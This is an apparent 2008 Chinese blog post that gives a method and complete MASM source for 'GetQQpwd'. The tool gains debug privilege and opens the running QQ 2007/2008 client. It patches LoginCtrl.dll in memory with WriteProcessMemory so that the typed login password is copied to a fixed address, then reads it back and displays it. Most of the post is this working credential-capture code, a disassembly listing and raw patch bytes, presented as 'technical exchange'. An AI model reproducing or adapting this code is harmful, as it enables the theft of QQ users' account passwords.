修改QQ执行顺序,获取QQ2008最新版密码_老羊吃狼

修改QQ执行顺序,获取QQ2008最新版密码(2008-07-29 12:02:10)

本文参考于open[xgc]大侠的"利用Debug Api 获得QQ2007密码",我只是换了语言换了方法,其实思路还是一样的.再次对open[xgc]表示感谢.

标题: 修改QQ执行顺序,获取QQ2008最新版密码
作者: sLtYJ(4stone)
版权声明: 本文纯属技术交流, 转载请注明作者并保持文章的完整, 谢谢!

参考open[xgc]大侠的文章,找到2007 7.1.643.400版及2008 8.0.714.201版本QQ的密码出现点,修改代码跳转至空白位置,然后将代码按个写入自己找到的空白位置即可.

列出2007办部分修改后的代码:
021A638A   |> /43             /INC EBX
021A638B   |. |6A 01          |PUSH 1
021A638D   |. |8BC3           |MOV EAX, EBX
021A638F   |. |0FAFC6         |IMUL EAX, ESI
021A6392      |8A4C08 FF      MOV CL, BYTE PTR DS:[EAX+ECX-1]
021A6396      |E9 4F240100    JMP LoginCtr.021B87EA   //修改点,跳至空白点
021A639B      |90             NOP
021A639C      |90             NOP
021A639D      |90             NOP
021A639E      |90             NOP
021A639F      |90             NOP
021A63A0   |. |50             |PUSH EAX
021A63A1      |884D D4        MOV BYTE PTR SS:[EBP-2C], CL
021A63A4      |E8 4AD30000    CALL LoginCtr.021B36F3
021A63A9   |. |8B57 44        |MOV EDX, DWORD PTR DS:[EDI+44]
021A63AC   |. |83C4 0C        |ADD ESP, 0C
021A63AF   |. |8B0A           |MOV ECX, DWORD PTR DS:[EDX]
021A63B1   |. |8B72 0C        |MOV ESI, DWORD PTR DS:[EDX+C]
021A63B4   |. |8B41 F8        |MOV EAX, DWORD PTR DS:[ECX-8]
021A63B7   |. |99             |CDQ
021A63B8   |. |F7FE           |IDIV ESI
021A63BA      |3BD8           CMP EBX, EAX
021A63BC     ^\7C CC          JL SHORT LoginCtr.021A638A

补上自己的代码:
021B87EA       52             PUSH EDX
021B87EB       BA 56CC1200    MOV EDX, 12CC56
021B87F0       03D3           ADD EDX, EBX     //借用QQ程序本身的EBX计数器
021B87F2       36:880A        MOV BYTE PTR SS:[EDX], CL    //向12CC56开始逐个写入密码
021B87F5       5A             POP EDX
021B87F6       8D45 D4        LEA EAX, DWORD PTR SS:[EBP-2C]
021B87F9       50             PUSH EAX
021B87FA       8D85 58FFFFFF LEA EAX, DWORD PTR SS:[EBP-A8]
021B8800     ^ E9 9BDBFEFF    JMP LoginCtr.021A63A0   //跳回原处继续执行
021B8805       90             NOP

用ASM代码实现如下:

GetQQpwd.Asm

引用:

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Dialog.asm
; 对话框资源使用的模板代码
    .386
    .model flat, stdcall
    option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include     GetQQpwd.inc
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
StrLen PROC uses edi String:DWORD
        mov edi,String
        mov al,0
        mov ecx,0FFFFFFFFh
        repne scasb
        sub ecx,0FFFFFFFFh
        neg ecx
        dec ecx
        mov eax,ecx
        ret
StrLen ENDP
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;     权限提升
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
    LOCAL       hToken
    LOCAL        tkp : TOKEN_PRIVILEGES

    invoke      GetCurrentProcess
    mov       edx, eax
    invoke      OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
    invoke      LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid
    mov       tkp.PrivilegeCount, 1
    xor       eax, eax

    .if      bFlags
          mov    eax, SE_PRIVILEGE_ENABLED
    .endif

    mov        tkp.Privileges.Attributes, eax
    invoke      AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0
    push       eax
    invoke      CloseHandle, hToken
    pop       eax

    ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcTimer    proc    uses ebx edi esi _hWnd,_uMsg,_idEvent,_dwTime

        .if     !hQQ
            invoke     FindWindowA,ctxt("#32770"),ctxt("QQ用户登录")
            .if    eax
                invoke     GetWindowThreadProcessId,eax,addr QQpid
                invoke     OpenProcess,PROCESS_ALL_ACCESS,FALSE,QQpid
                mov     hQQ,eax
                invoke     SetWindowText,hWinMain,ctxt("QQ已启动-请输入密码并点登录")
                invoke       CreateToolhelp32Snapshot,TH32CS_SNAPALL,QQpid
                mov          hSnapShot,eax
                mov          myModule.dwSize, sizeof myModule
                invoke     Module32First,hSnapShot,addr myModule
                jmp     Cmp1
             NextModule:
                invoke     Module32Next,hSnapShot,addr myModule
             Cmp1:
                invoke     lstrcmp,addr myModule.szModule,ctxt("LoginCtrl.dll")
                cmp    eax,0
                jnz      NextModule
                mov    ebx,myModule.modBaseAddr
                add    ebx,16396h;2008:16DE0h,2007:16396h
                invoke     ReadProcessMemory,hQQ,ebx,addr dbOldBytes,2,NULL
                mov    ax,word ptr dbOldBytes
                .if    ax == word ptr db2007
                    invoke     WriteProcessMemory,hQQ,ebx,addr dbPatched1,10,NULL
                    add    ebx,12454h;2008:134EAh 2007:12454h
                    invoke     WriteProcessMemory,hQQ,ebx,addr dbPatched2,28,NULL
                    invoke     WriteProcessMemory,hQQ,12B000h,0,16,NULL
                .elseif    ax == word ptr db2008
                    add    ebx,0A4Ah
                    invoke     WriteProcessMemory,hQQ,ebx,addr dbPatched3,10,NULL
                    add    ebx,134EAh
                    invoke     WriteProcessMemory,hQQ,ebx,addr dbPatched4,27,NULL
                    invoke     WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL
                .endif
            .endif
        .else
            invoke     ReadProcessMemory,hQQ,12B000h,addr QQpwd,sizeof QQpwd,NULL
            invoke     StrLen,addr QQpwd
            .if    eax
                invoke     SetDlgItemText,hWinMain,IDC_EDT1,addr QQpwd
                invoke     WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL
            .endif
                invoke     FindWindow,ctxt("#32770"),ctxt("QQ用户登录")
            .if     !eax
                mov     hQQ,0
                invoke     SetWindowText,hWinMain,ctxt("QQ未运行")
            .endif
        .endif
        ret

_ProcTimer    endp
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam

        mov    eax,wMsg
        .if    eax == WM_COMMAND
            mov    eax,wParam
            .if    ax == IDC_btExit
                invoke     EndDialog,hWnd,NULL
            .endif
        .elseif    eax == WM_CLOSE
            invoke     EndDialog,hWnd,NULL
        .elseif    eax == WM_INITDIALOG
            invoke     LoadIcon,hInstance,ICO_MAIN
            invoke     SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
            invoke     SetTimer,NULL,NULL,1000,addr _ProcTimer
            mov     idTimer,eax
            push     hWnd
            pop     hWinMain
            invoke      _EnablePrivilege,ctxt("SeDebugPrivilege"), TRUE
            invoke     SendDlgItemMessage,hWnd,IDC_EDT1,EM_SETREADONLY,TRUE,0
            invoke       SetWindowPos,hWnd,HWND_TOPMOST,0,0,0,0,SWP_NOMOVE or SWP_NOSIZE
        .else
            mov    eax,FALSE
            ret
        .endif
        mov    eax,TRUE
        ret

_ProcDlgMain    endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
        invoke     GetModuleHandle,NULL
        mov     hInstance,eax
        invoke     InitCommonControls
        invoke     DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
        invoke     ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        end     start

GetQQpwd.inc

引用:

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include         windows.inc
include         user32.inc
includelib         user32.lib
include         kernel32.inc
includelib         kernel32.lib
include         advapi32.inc
includelib         advapi32.lib
include         comctl32.inc
includelib         comctl32.lib
include         psapi.inc
includelib         psapi.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ID_TIMER1    equ     10
DLG_MAIN    equ     1
IDC_EDT1        equ      2
ICO_MAIN     equ     99
IDC_btExit    equ     1000
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data?

hInstance        dd         ?
hWinMain        dd         ?
idTimer        dd         ?
QQpid        dd         ?
hQQ        dd         ?
modArr        db         1024 dup(?)
dwNumMod    dd         ?
myModule                  MODULEENTRY32   <>
hSnapShot    dd         ?
QQpwd        db         22 dup(?)
dbOldBytes    db         2 dup (?)

        .data

db2007        db         8Dh,45h
db2008        db         6Ch,88h
dbPatched1    db         0E9h,4Fh,24h,01h,00h,90h,90h,90h,90h,90h
dbPatched2    db         52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 9Bh, 0DBh, 0FEh, 0FFh, 90h
dbPatched3    db         0E9h, 0E5h, 34h, 01h, 00h, 90h, 90h, 90h, 90h, 90h
dbPatched4    db         52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 05h, 0CBh, 0FEh, 0FFh
dbNull        db         00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h

已投稿到：排行榜圈子

阅读|评论|收藏|打印|举报

前一篇：日常小工具，我有百酷工具箱
后一篇：日记 [2008年07月29日]

评论重要提示：警惕虚假中奖信息，点击查看详情[发评论]

评论加载中，请稍候...

发评论 明星私家相册

插入表情

登录名：
密码：
找回密码
注册
昵称：
匿名评论

验证码： 看不清楚数字吗？点击这里再试试。收听验证码

发评论

以上网友发言只代表其个人观点，不代表新浪网的观点或立场。